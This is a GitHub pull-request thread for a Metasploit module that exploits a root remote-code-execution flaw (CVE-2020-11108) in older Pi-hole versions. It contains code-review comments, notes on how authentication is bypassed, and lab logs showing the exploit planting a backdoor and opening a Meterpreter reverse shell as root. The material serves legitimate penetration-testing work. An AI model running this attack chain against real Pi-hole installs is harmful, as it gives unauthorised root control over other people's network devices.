Pi-Hole < 4.4 root RCE CVE-2020-11108
rapid7/metasploit-framework pull request #13445
Opened 2020-05-13 03:01 UTC by h00die

Root exploit against Pi-Hole < 4.4 for cve-2020-11108.

Verified against 4.3.2, (modified code) tested against 4.4 and it was a no go.

## Verification

Install a vuln pihole

- [ ] Start `msfconsole`
- [ ] `use exploit/unix/http/pihole_blocklist_exec`
- [ ] `set rhost/srvhost/etc`
- [ ] **Verify** you get a root exploit
- [ ] **Document** make sure its all grammar and spelling and good.

2020-05-13 07:09 UTC, bcoles reviewed
Parenthesis will soon be mandatory.

2020-05-13 07:09 UTC, bcoles commented on modules/exploits/unix/http/pihole_blocklist_exec.rb
> +            [ 'CVE', '2020-11108']
```suggestion
            ['EDB', '48443'],
            ['URL', 'https://frichetten.com/blog/cve-2020-11108-pihole-rce/'],
            ['CVE', '2020-11108']
```

2020-05-13 07:09 UTC, bcoles commented on modules/exploits/unix/http/pihole_blocklist_exec.rb
> +      ], self.class
```suggestion
      ]
```

2020-05-13 07:09 UTC, bcoles commented on modules/exploits/unix/http/pihole_blocklist_exec.rb
> +      vprint_status('Server received default reqeust for #{request.uri}')
```suggestion
      vprint_status('Server received default request for #{request.uri}')
```

2020-05-13 07:09 UTC, bcoles commented on modules/exploits/unix/http/pihole_blocklist_exec.rb
> +      fail_with(Failure::BadConfig, 'Target is not vulnerable')
This error message doesn't make sense.

2020-05-13 13:01 UTC, h00die commented
## Negative Test Cases
Correctly identifies 4.4 and 5.0
```
msf5 exploit(unix/http/pihole_blocklist_exec) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf5 exploit(unix/http/pihole_blocklist_exec) > [-] Version Detected: 4.4
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
check
[-] Version Detected: 5.0
[*] 2.2.2.2:80 - The target is not exploitable.
```

2020-05-13 16:36 UTC, h00die commented
@Frichetten FYI.  Do you want an email added to your POC for the exploit?

2020-05-13 16:43 UTC, Frichetten commented
Hi @h00die, no thank you. I'm okay with just the link to my blog. If someone really wanted to contact me they could find the info there (I'm always nervous about an my email being in plaintext somewhere bots could find it and spam me).

Thank you for taking the time to build an actual Metasploit module for it! I never thought of doing that.

2020-05-13 17:08 UTC, Frichetten commented
Also just a heads up that Pi-hole v4.4 is vulnerable. If you like I can take a stab at debugging it and seeing what's up. (Pi-hole Version v4.4, Web Interface Version v4.33, FTL Version v4.3.1)

2020-05-14 00:47 UTC, h00die commented
@Frichetten thanks for writing an awesome blog with step by step instructions, and using python so I could actually follow along.

You were right on the 4.4, I adjusted the code a bit and got it working.

2020-05-14 03:33 UTC, Frichetten commented on modules/exploits/unix/http/pihole_blocklist_exec.rb
> +      cookie = res.get_cookies
Hey @h00die, out of curiosity how are you authenticating here? (Full disclosure, I've never written a line of Ruby). It looks like it's just making a get request to /admin/index.php and using the PHP session cookie. I'm pretty sure you'd need to authenticate first. Either by getting a username and password from the user, or by the user supplying an authenticated session token.

2020-05-14 03:49 UTC, h00die commented on modules/exploits/unix/http/pihole_blocklist_exec.rb
> +      cookie = res.get_cookies
correct.
When I set it up, it never asked to make a user, or authentication for the webapp (at least that i remember).  Maybe I missed a config?

I just set up 3.2.1 as well and it never asked me either, but maybe that feature was added later.

2020-05-14 03:56 UTC, h00die commented
throwing a delay label on here to investigate authentication

2020-05-14 04:01 UTC, Frichetten commented
Interesting. I’m not sure if 3.2.1 has authentication, but 4.4 does. When you install it will set a random one and the user can change it. ![image](https://user-images.githubusercontent.com/10386884/81891154-5fd52700-956d-11ea-9fa1-bc65f2f04e48.jpeg)

A quick/simple fix could be to ask for an authenticated session cookie from the user. Then just set ‘cookie = “PHPSESSID=*user cookie*”’

2020-05-14 04:04 UTC, h00die commented
should be easy enough to add a password option, then send a post (or get then post for any csrf/tokens) to authenticate.  I'll do a re-install of 3.2.1 and 4.4 and see if i can't find one.  Now that the <3.3 exploit is up, I also wanted to do CVE-2020-8816, so a common library for authentication would be nice to have.

2020-05-14 12:52 UTC, h00die commented
for notes, pihole 4.4, and 4.3.2 are strange in their logins.
They have no CSRF/token protection.  Next, when you hit a page that requires auth, you don't get a redirect, it just gives you the login page content on the URL you specified.  You send the POST to login to ANY URL (or at least i did it to the `/admin/settings.php` page) even though the traditional login page is `/admin/index.php?login`.  It will then refresh the page with the appropriate content.

This is actually easier than expected, no token grabbing, no processing redirects etc.

2020-05-14 14:46 UTC, wvu-r7 commented on modules/exploits/unix/http/pihole_blocklist_exec.rb
> +      # update gravity
Okay, Einstein.

2020-05-14 14:47 UTC, acammack-r7 requested changes
Nice module! Some small fixes to avoid `nil`s and creating unneeded regexes.

2020-05-14 14:47 UTC, acammack-r7 commented on modules/exploits/unix/http/pihole_blocklist_exec.rb
> +      if /Sign in to start your session/ =~ res.body
```suggestion
      if res && res.body.include?('Sign in to start your session')
```

2020-05-14 14:47 UTC, acammack-r7 commented on modules/exploits/unix/http/pihole_blocklist_exec.rb
> +      if /Sign in to start your session/ =~ res.body
```suggestion
      if res && res.body.include?('Sign in to start your session')
```

2020-05-15 16:04 UTC, adfoster-r7 commented
Looks like a solid module, should be able to land this later :+1:

---

Running check against 5.0

```
msf5 exploit(unix/http/pihole_blocklist_exec) > set verbose true
verbose => true
msf5 exploit(unix/http/pihole_blocklist_exec) > check

[-] Version Detected: 5.0
[*] 127.0.0.1:80 - The target is not exploitable.
```

Running check against 4.3

```
[+] Version Detected: 4.3
[*] 127.0.0.1:80 - The target appears to be vulnerable.
```

Running against 4.3 with a valid password

```
msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.3
[*] Using URL: http://192.168.222.1:80/
[*] Using cookie: PHPSESSID=fj7l5goh1hcs2ntmkb8gd3ipg2;
[*] Login required, attempting login.
[*] Using token: f9qnxBv48noc7Ym3wRCc9RDzNm/e51PWkXqZ8PQDgWQ=
[*] Adding backdoor reference
[*] Forcing gravity pull
[*] Received GET request.  Responding
[*] Sending 2nd gravity update request.
[*] Forcing gravity pull
[*] (1/2) Sending priv esc trigger
[*] Adding root reference
[*] Forcing gravity pull
[*] Received GET request.  Responding
[*] Sending 2nd gravity update request.
[*] Forcing gravity pull
[*] (2/2) Sending root payload
[*] Popping root shell
[*] Sending stage (38288 bytes) to 192.168.222.128
[*] Meterpreter session 3 opened (192.168.222.1:4444 -> 192.168.222.128:56936) at 2020-05-15 17:02:39 +0100
[+] Deleted YUQ1KxZP.php
sessions -1
[*] Starting interaction with 3...

meterpreter > 
```

Running against 4.3 with an invalid password

```
[*] Using URL: http://192.168.222.1:80/
[*] Using cookie: PHPSESSID=kg1c6gkidtgv9gvutdmo0eefs2;
[*] Login required, attempting login.
[-] Exploit aborted due to failure: bad-config: Incorrect Password
[*] Server stopped.
```

This was my docker-compose file:

<details>
<summary>docker-compose.yml</summary>

```yaml
version: "3"

# More info at https://github.com/pi-hole/docker-pi-hole/ and https://docs.pi-hole.net/
services:
  pihole:
    container_name: pihole
    image: pihole/pihole:4.3
    ports:
#      - "53:53/tcp"
#      - "53:53/udp"
#      - "67:67/udp"
      - "80:80/tcp"
#      - "443:443/tcp"
    environment:
      TZ: 'America/Chicago'
      WEBPASSWORD: 'password123'
    # Volumes store your data between container upgrades
    #volumes:
    #   - './etc-pihole/:/etc/pihole/'
    #   - './etc-dnsmasq.d/:/etc/dnsmasq.d/'
    dns:
      - 127.0.0.1
      - 1.1.1.1
    # Recommended but not required (DHCP needs NET_ADMIN)
    #   https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
    cap_add:
      - NET_ADMIN
    restart: unless-stopped
```
</details>

2020-05-15 17:09 UTC, h00die commented
I'm hoping to write a 3rd pihole exploit in the next day or two. May make a cool weekly summary if all 3 land the same week 😉

2020-05-18 12:44 UTC, merged

2020-05-18 12:46 UTC, adfoster-r7 commented
## Release Notes

Adds module for cve-2020-11108, Pi-Hole <= 4.4 root exploit